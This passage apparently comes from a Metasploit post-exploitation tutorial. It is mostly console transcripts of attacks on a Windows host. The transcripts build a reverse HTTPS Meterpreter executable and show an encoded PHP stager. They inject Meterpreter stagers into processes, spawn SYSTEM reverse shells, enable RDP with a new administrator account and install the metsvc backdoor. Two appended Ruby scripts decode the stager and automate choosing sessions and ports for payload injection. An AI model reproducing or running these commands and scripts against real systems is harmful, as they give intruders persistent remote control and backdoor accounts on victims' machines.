As long as the server isn't shut down! Everyone knows HTTP and HTTPS get through firewalls. detach is the command that drops the session's connection (an HTTP/HTTPS Meterpreter keeps calling back after a detach, which is the point of using that transport).

PHP:

msf payload(bind_php) > generate -t raw -e php/base64
eval(base64_decode(CQkKCQkJQHNldF90aW1lX2xpbWl0KDApOyBAaWdub3JlX3VzZXJfYWJvcnQoMSk7IEBpbmlfc2

(The generated output is cut off here in the original.)

Windows, a reverse HTTPS executable built with msfvenom:

brk@Dis9Team:~$ sudo msfvenom -p windows/meterpreter/reverse_https -f exe LHOST=5.5.5.1 LPORT=1111 > https.exe
brk@Dis9Team:~$ file https.exe
https.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit

The persistence script's cleanup resource file, which removes the VBS it dropped on the target:

meterpreter > resource /root/.msf4/logs/persistence/DIS9TEAM-A1_20120321.5048/DIS9TEAM-A1_20120321.5048.rc
[*] Reading /root/.msf4/logs/persistence/DIS9TEAM-A1_20120321.5048/DIS9TEAM-A1_20120321.5048.rc
[*] Running rm c:\windows\\FBEzRzQYpXKFg.vbs

Injecting a second payload into a running process with post/windows/manage/payload_inject:

msf exploit(ms08_067_netapi) > use post/windows/manage/payload_inject
msf post(payload_inject) > show options

Module options (post/windows/manage/payload_inject):

   Name     Current Setting                  Required  Description
   ----     ---------------                  --------  -----------
   HANDLER  false                            no        Start an Exploit Multi Handler to receive the connection
   LHOST    5.5.5.1                          yes       IP of host that will receive the connection from the payload.
   LPORT    4433                             no        Port for Payload to connect to.
   OPTIONS                                   no        Comma separated list of additional options for payload if needed in 'opt=val,opt=val' format.
   PAYLOAD  windows/meterpreter/reverse_tcp  no        Windows Payload to inject into memory of a process.
   PID                                       no        Process Identifier to inject of process to inject payload.
   SESSION                                   yes       The session to run this module on.

msf post(payload_inject) > set PAYLOAD windows/meterpreter/reverse_https
PAYLOAD => windows/meterpreter/reverse_https
msf post(payload_inject) > set LPORT 9999
LPORT => 9999
msf post(payload_inject) > set TimestampOutput 0
TimestampOutput => 0
msf post(payload_inject) > set SESSION 5
SESSION => 5
msf post(payload_inject) > exploit

[*] Running module against DIS9TEAM-A1
[*] Performing Architecture Check
[*] Process found checking Architecture
[+] Process is the same architecture as the payload
[*] Injecting Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager into process ID 1636
[*] Opening process 1636
[*] Generating payload
[*] Allocating memory in procees 1636
[*] Allocated memory at address 0x00780000, for 363 byte stager
[*] Writing the stager into memory...
[+] Successfully injected payload in to process: 1636
[*] Post module execution completed

msf post(payload_inject) > sessions

Active sessions
===============

  Id  Type                   Information                        Connection
  --  ----                   -----------                        ----------
  4   meterpreter x86/win32  DIS9TEAM-A1\brk @ DIS9TEAM-A1      5.5.5.1:1111 -> 5.5.5.3:1280 (5.5.5.3)
  5   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ DIS9TEAM-A1  5.5.5.1:4444 -> 5.5.5.3:1042 (5.5.5.3)

Note that HANDLER was left at false here, so a multi/handler for windows/meterpreter/reverse_https on 5.5.5.1:9999 has to be started separately, otherwise the injected stager has nothing to connect back to. That is why the session list still shows only sessions 4 and 5.

Spawning a system-level shell with post/multi/manage/system_session:

msf post(payload_inject) > use post/multi/manage/system_session
msf post(system_session) > show options

Module options (post/multi/manage/system_session):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   HANDLER  false            yes       Start an Exploit Multi Handler to receive the connection
   LHOST    5.5.5.1          yes       IP of host that will receive the connection from the payload.
   LPORT    4433             no        Port for Payload to connect to.
   SESSION                   yes       The session to run this module on.
   TYPE     auto             yes       Scripting environment on target to use for reverse shell (accepted: auto, ruby, python, perl, bash)

msf post(system_session) > set HANDLER true
HANDLER => true
msf post(system_session) > sessions

Active sessions
===============

  Id  Type                   Information                        Connection
  --  ----                   -----------                        ----------
  4   meterpreter x86/win32  DIS9TEAM-A1\brk @ DIS9TEAM-A1      5.5.5.1:1111 -> 5.5.5.3:1280 (5.5.5.3)
  5   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ DIS9TEAM-A1  5.5.5.1:4444 -> 5.5.5.3:1042 (5.5.5.3)

msf post(system_session) > set SESSION 5
SESSION => 5
msf post(system_session) > exploit
[-] Post failed: Msf::OptionValidateError The following options failed to validate: TYPE.
msf post(system_session) > set TYPE bash
TYPE => bash
msf post(system_session) > exploit

[*] Starting exploit multi handler
[*] Started reverse handler on 5.5.5.1:4433
[*] Starting the payload handler...
[*] Post module execution completed

msf post(system_session) > set TYPE python
TYPE => python
msf post(system_session) > exploit

[*] Starting exploit multi handler
[-] Job 4 is listening on IP 5.5.5.1 and port 4433
[-] Could not start handler!
[-] A job is listening on the same Port
[*] Post module execution completed

msf post(system_session) > set LPORT 5555
LPORT => 5555
msf post(system_session) > exploit

[*] Starting exploit multi handler
[*] Started reverse handler on 5.5.5.1:5555
[*] Starting the payload handler...
[*] Post module execution completed
msf post(system_session) >

Two things to notice: the handler from the first run (job 4) stays bound to 4433, so every later run needs a different LPORT; and in each run only the handler starts, no new session is shown opening, which is what you would expect when the chosen interpreter (bash, python) is not present on the Windows target.

Opening 3389 automatically: simple. Load the module, set the username, password and port, and fill in SESSION with the ID (as below). If the account can't be added this way, drop into the session's shell, add it there, and add it to the administrators group.

msf post(enable_rdp) > show options

Module options (post/windows/manage/enable_rdp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   ENABLE    true             no        Enable the RDP Service and Firewall Exception.
   FORDWARD  false            no        Forward remote port 3389 to local Port.
   LPORT     3389             no        Local port to fordward remote connection.
   PASSWORD                   no        Password for the user created.
   SESSION                    yes       The session to run this module on.
   USERNAME                   no        The username of the user to create.

msf post(enable_rdp) > set USERNAME test
USERNAME => test
msf post(enable_rdp) > set PASSWORD test
PASSWORD => test
msf post(enable_rdp) > set SESSION 5
SESSION => 5
msf post(enable_rdp) > exploit

[*] Enabling Remote Desktop
[*] 	RDP is disabled; enabling it ...
[*] Setting Terminal Services service startup mode
[*] 	The Terminal Services service is not set to auto, changing it to auto ...
[*] 	Opening port in local firewall if necessary
[*] Setting user account for logon
[*] 	Adding User: test with Password: test
[*] 	Adding User: test to local group 'Remote Desktop Users'
[*] 	Adding User: test to local group 'Administrators'
[*] You can now login with the created user
[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20120322003120_default_5.5.5.3_host.windows.cle_876250.txt
[*] Post module execution completed
msf post(enable_rdp) >

Every one of those steps (the registry change, the service startup mode, the firewall exception, a new local administrator in Remote Desktop Users) is an artifact on the host, so keep that cleanup resource file.

Injecting a further Meterpreter into a fresh process with post/windows/manage/multi_meterpreter_inject:

msf post(enable_rdp) > use post/windows/manage/multi_meterpreter_inject
msf post(multi_meterpreter_inject) > set PAYLOAD windows/meterpreter/reverse_tcp
msf post(multi_meterpreter_inject) > set HANDLER true
HANDLER => true
msf post(multi_meterpreter_inject) > set LPORT 5624
LPORT => 5624
msf post(multi_meterpreter_inject) > exploit

[*] Running module against DIS9TEAM-A1
[*] Starting connection handler at port 5624 for windows/meterpreter/reverse_tcp
[+] Multi/Handler started!
[*] Creating a reverse meterpreter stager: LHOST=5.5.5.1 LPORT=5624
[+] Starting Notepad.exe to house Meterpreter Session.
[+] Process created with pid 1168
[*] Injecting meterpreter into process ID 1168
[*] Allocated memory at address 0x00780000, for 290 byte stager
[*] Writing the stager into memory...
[+] Successfully injected Meterpreter in to process: 1168
[*] Meterpreter session 6 opened (5.5.5.1:5624 -> 5.5.5.3:1064) at 2012-03-22 00:40:19 +0800
[*] Post module execution completed
msf post(multi_meterpreter_inject) >

Got a shell.

Next, metsvc (the Meterpreter service backdoor). Note that metsvc is an unauthenticated bind service: anyone who can reach its port gets a Meterpreter shell, not just you.

brk@Dis9Team:/tmp$ wget http://www.phreedom.org/software/metsvc/releases/metsvc-1.0.zip
--2012-03-22 00:54:49--  http://www.phreedom.org/software/metsvc/releases/metsvc-1.0.zip
Resolving www.phreedom.org... 66.45.226.226
Connecting to www.phreedom.org|66.45.226.226|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 55871 (55K) [application/zip]
Saving to: "metsvc-1.0.zip"

100%[======================================>] 55,871      46.2K/s   in 1.2s

2012-03-22 00:54:52 (46.2 KB/s) - "metsvc-1.0.zip" saved [55871/55871]

brk@Dis9Team:/tmp$ unzip metsvc-1.0.zip
Archive:  metsvc-1.0.zip
   creating: metsvc-1.0/
  inflating: metsvc-1.0/ChangeLog.txt
  inflating: metsvc-1.0/metsvc-server.exe
  inflating: metsvc-1.0/metsvc.exe
  inflating: metsvc-1.0/README.txt
   creating: metsvc-1.0/src/
  inflating: metsvc-1.0/src/Makefile
  inflating: metsvc-1.0/src/metsvc-server.cpp
  inflating: metsvc-1.0/src/metsvc.cpp
  inflating: metsvc-1.0/src/metsvc.h
  inflating: metsvc-1.0/test.rb
brk@Dis9Team:/tmp$ cd metsvc-1.0/
brk@Dis9Team:/tmp/metsvc-1.0$ cp /pen/msf3/data/meterpreter/met
metcli.exe         meterpreter.php    metsrv.x64.dll     metsvc-server.exe
meterpreter.jar    metsrv.dll         metsvc.exe

(Tab completion listing the candidates in the Metasploit data directory; metsrv.dll is the one that goes next to metsvc.)

brk@Dis9Team:/tmp/metsvc-1.0$ cp /pen/msf3/data/meterpreter/metsrv.dll .
brk@Dis9Team:/tmp/metsvc-1.0$ ls
ChangeLog.txt  metsrv.dll  metsvc-server.exe  metsvc.exe  README.txt  src  test.rb
brk@Dis9Team:/tmp/metsvc-1.0$
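The PHP stager at the top of the post is shown only as the php/base64 encoder's eval(base64_decode(...)) wrapper, cut off mid-string. The following Ruby is an added example, not code from the post or from Metasploit: it unwraps that shell (padding the truncated base64 instead of failing on it) so the stager's first calls can be read, and flags the two PHP calls behind "as long as the server isn't shut down". The wrapper function only mimics the shape of the encoder's output; the real encoder may quote or obfuscate the string differently, which is an assumption stated in the code.

```ruby
require 'base64'

# Added example, not code from the original post. It unwraps the
# eval(base64_decode("...")) shell that the php/base64 encoder puts around a
# PHP payload so the stager's behaviour can be read. The base64 below is the
# truncated string printed on the page; "c2" at the end is an incomplete group.
PAGE_B64 = 'CQkKCQkJQHNldF90aW1lX2xpbWl0KDApOyBAaWdub3JlX3VzZXJfYWJvcnQoMSk7IEBpbmlfc2'

# Wrap a PHP body in the shape of the encoder's output (assumption: the real
# encoder may add quoting or obfuscation around the string; the idea is the same).
def php_base64_wrap(php)
  body = php.sub(/\A\s*<\?php\s*/, '').sub(/\s*\?>\s*\z/, '')
  "eval(base64_decode(\"#{Base64.strict_encode64(body)}\"));"
end

# Pull the base64 argument out of eval(base64_decode(...)). Quotes are
# optional because the console output on the page prints it bare and cut off.
def extract_b64(wrapped)
  m = wrapped.match(%r{base64_decode\(\s*["']?([A-Za-z0-9+/=]+)})
  m && m[1]
end

# Decode leniently: pad a partial trailing group instead of raising, so a
# truncated dump still yields everything that is recoverable.
def php_base64_unwrap(wrapped)
  b64 = extract_b64(wrapped)
  return nil unless b64
  b64 += '=' * ((4 - b64.length % 4) % 4)
  Base64.decode64(b64)
end

# The two calls behind "as long as the server isn't shut down": no script
# execution time limit, and keep running after the HTTP client goes away.
def persistence_markers(php)
  {
    no_time_limit: php.include?('set_time_limit(0)'),
    ignore_abort:  php.include?('ignore_user_abort(1)')
  }
end

if __FILE__ == $PROGRAM_NAME
  decoded = php_base64_unwrap("eval(base64_decode(#{PAGE_B64}")
  puts decoded.strip
  p persistence_markers(decoded)
end
```

Run as a script it prints the recoverable prefix of the page's stager, @set_time_limit(0); @ignore_user_abort(1); @ini_s, which is exactly why a bind_php shell survives the user closing the browser: the script has no time limit and ignores the client going away.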
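Two operational details in the transcripts above are worth automating when this is scripted rather than typed: payload_inject and system_session have to be pointed at the SYSTEM session of the right architecture, and a handler cannot be started on a port another job already holds (the "A job is listening on the same Port" failure at 4433). The Ruby below is an added example, not code from the post or from Metasploit. It parses the `sessions` table from the page (embedded as sample text), picks the SYSTEM x86 session, chooses an LPORT that no handler or existing callback is using, and emits the msfconsole commands for payload_inject. The list of ports already held by handlers is an assumption passed in by the caller.

```ruby
require 'set'

# Added example, not code from the original post. SESSIONS_OUTPUT is the
# session table printed on the page, embedded here as sample input.
SESSIONS_OUTPUT = <<~TXT
  Active sessions
  ===============

    Id  Type                   Information                        Connection
    --  ----                   -----------                        ----------
    4   meterpreter x86/win32  DIS9TEAM-A1\\brk @ DIS9TEAM-A1      5.5.5.1:1111 -> 5.5.5.3:1280 (5.5.5.3)
    5   meterpreter x86/win32  NT AUTHORITY\\SYSTEM @ DIS9TEAM-A1  5.5.5.1:4444 -> 5.5.5.3:1042 (5.5.5.3)
TXT

Session = Struct.new(:id, :type, :arch, :user, :host, :lhost, :lport, :rhost, :rport)

# One row of the table: id, type, arch, "user @ host", "lhost:lport -> rhost:rport".
SESSION_RE = /^\s*(\d+)\s+(\S+)\s+(\S+)\s+(.+?) @ (\S+)\s+([\d.]+):(\d+) -> ([\d.]+):(\d+)/

def parse_sessions(text)
  text.each_line.map do |line|
    m = SESSION_RE.match(line)
    next unless m
    Session.new(m[1].to_i, m[2], m[3], m[4].strip, m[5], m[6], m[7].to_i, m[8], m[9].to_i)
  end.compact
end

# payload_inject refuses a process whose architecture differs from the payload
# ("Performing Architecture Check"), so match the arch as well as the user.
def pick_system_session(sessions, arch: 'x86/win32')
  sessions.find { |s| s.user.end_with?('\\SYSTEM') && s.arch == arch }
end

# A handler cannot share a port with a running job, and the ports existing
# sessions call back to are listeners as well; walk past all of them.
# handler_ports is an assumption supplied by the caller (e.g. from `jobs`).
def free_lport(sessions, handler_ports, start: 4433)
  taken = handler_ports.to_set | sessions.map(&:lport)
  port = start
  port += 1 while taken.include?(port)
  port
end

# Emit the msfconsole commands for post/windows/manage/payload_inject with
# HANDLER true, so the injected stager has a listener to reach.
def payload_inject_rc(sessions, handler_ports, lhost:, payload: 'windows/meterpreter/reverse_https')
  s = pick_system_session(sessions)
  raise 'no SYSTEM session with matching architecture' unless s
  <<~RC
    use post/windows/manage/payload_inject
    set PAYLOAD #{payload}
    set LHOST #{lhost}
    set LPORT #{free_lport(sessions, handler_ports)}
    set HANDLER true
    set SESSION #{s.id}
    run
  RC
end

if __FILE__ == $PROGRAM_NAME
  puts payload_inject_rc(parse_sessions(SESSIONS_OUTPUT), [4433], lhost: '5.5.5.1')
end
```

With the page's two sessions and 4433 already held by the system_session handler, this selects session 5 and LPORT 4434 (1111 and 4444 are skipped too, since those listeners already serve sessions 4 and 5). The emitted text can be saved as a .rc file and loaded with `resource`, the same mechanism the persistence cleanup file above uses.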






